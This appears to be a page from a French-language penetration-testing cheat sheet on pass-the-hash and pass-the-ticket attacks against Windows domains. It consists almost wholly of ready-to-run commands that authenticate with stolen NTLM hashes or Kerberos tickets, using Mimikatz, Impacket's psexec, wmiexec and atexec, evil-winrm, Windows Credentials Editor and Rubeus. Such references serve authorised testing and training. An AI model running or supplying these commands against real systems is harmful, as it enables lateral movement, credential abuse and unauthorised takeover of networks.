🚧Pass the Hash/Ticket

Pass the Hash

Mimikatz :

Invoke-Mimikatz -Command '"sekurlsa::pth /user:username /domain:domain.tld /ntlm:NTLMhash /run:powershell.exe"'

Impacket :

psexec_windows.exe -hashes ":NTHASH" user@<domain>
wmiexec_windows.exe -hashes ":NTHASH" user@<domain>
atexec_windows.exe -hashes ":NTHASH" user@<domain> 'whoami'

EvilWin-RM:

evil-winrm -u <username> -H <Hash> -i <IP>

Windows Credentials Editor :

wce.exe -s <username>:<domain>:<hash_lm>:<hash_nt>

Pass the Ticket

Récupérer les tickets en mémoire :

mimikatz.exe "kerberos::ptt "kirbi_ticket"
.\Rubeus.exe ptt /ticket:kirbi_ticket

PreviousAS-REP RoastingNextMSSQL Trusted Links

Last updated

Was this helpful?